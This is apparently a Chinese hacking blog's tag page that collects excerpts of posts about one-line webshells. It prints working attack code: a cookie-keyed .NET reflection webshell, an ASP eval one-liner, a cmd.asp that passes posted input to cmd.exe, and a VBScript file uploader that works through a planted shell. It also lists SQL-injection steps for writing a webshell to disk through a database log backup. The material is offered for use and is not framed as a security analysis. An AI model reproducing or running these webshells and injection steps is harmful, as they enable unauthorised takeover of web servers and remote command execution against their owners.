标签 ‘一句话马’ 下的日志

零魂PHP一句话木马客户端(一键提交版)

Author:零魂(zerosoul)

V0.2
2009-11-11(正好是光棍节,晕~)更新内容:
—————————–
1.修补了下原始版本有些服务器不能正常运行的大Bug。
2.去掉了提交后的登陆密码验证,提交后直接进入大马界面。
阅读全文 »

Tags: ,

ASPXshell MS08-067插件

作者:cnqing

ASPXshell MS08-067插件
感谢hi群众兄测试,附赠几个插件。。。
1.扫可写目录插件
使用方法:设置扫描起始目录,设置扫描成功N个后停止,扫描。
阅读全文 »

Tags: , , , ,

新型 .net 一句话及客户端

鬼仔注:刚从外面回来,看到cnqing在gtalk上给我的留言,只扔给一个链接。

作者:cnqing

软件说明:
程序包 包括一个基于反射的.net 一句话木马。

<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["psw"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>

客户端 当前插件
文件管理
.net探针
CMDshell
端口转发

阅读全文 »

Tags: , , ,

DB_ONER权限日志备分专用一句话木马

来源:s0n9 '5 b109

<%eval(request("a")):response.end%> 备分专用一句话
加个response.end会有不一样的效果,也就是插入一句话后所有的代码都无效,在一句话这里打止,也就减小了webshell的大小.

日志备分WEBSHELL标准的七步:

1.InjectionURL';alter database XXX set RECOVERY FULL– (把SQL设置成日志完全恢复模式)

2.InjectionURL';create table cmd (a image)– (新建立一个cmd表)

3.InjectionURL';backup log XXX to disk = 'c:\cmd' with init– (减少备分数据的大小)
阅读全文 »

Tags:

ZV新型PHP一句话木马客户端GUI版(Include利用方式)

作者:云杉
信息来源:火狐技术联盟


ZV新型PHP一句话木马客户端GUI版(Include利用方式) by 执着我一生[F.S.T]
=============
说明
=============
1. 说起写这个东西,我是看了ZV大大的《一种关于一句话木马的更新思想》这篇文章后,向我等这样的菜鸟利用起来确实挺麻烦,所以就有了这个工具。工具写的垃圾,有的功能实现不了,拿不出手啊。。。
愿意用的就用吧,高手可以飘过了:)

原始的文章地址:
http://my.opera.com/zvrop/blog/show.dml/394634
阅读全文 »

Tags:

关于一句话木马

来源:http://home.86hy.com/

这里的asp后门不指像那些一句话木马、砍客、冰狐之类的b/s型的,只指像cmd.asp或2005a.asp的。
第一个,来看zzzeva免fso的cmd.asp
代码如下:<form method="post">
<input type=text name="cmd" size=60>
<input type=submit value="run"></form>
<textarea readonly cols=80 rows=20>
<%response.write server.createobject("wscript.shell").exec("cmd.exe /c
"&request.form("cmd")).stdout.readall%>
</textarea>
是不是觉得有点长了?在注入时写有点不好写。那来改一下。
阅读全文 »

Tags:

一句话木马用upfile.vbs

来自:情感网络联盟

with wscript
if .arguments.count<2 then .quit
ffn=replace(.arguments(1),”\”,”%5C”):ffn=replace(ffn,”:”,”%3A”):ffn=replace(ffn,”~”,”%7E”)
url= “http://www.xxxx.com/a.asp?a=with+server.createobject%28%22adodb.stream%22%29%0D%0A.type%3D1%0D%0A.open%0D%0A.write+request.binaryread%28request.totalbytes%29%0D%0A.savetofile+%22″&ffn&”%22%2C2%0D%0Aend+with%0D%0AResponse.end”
fn=.arguments(0)
阅读全文 »

Tags: ,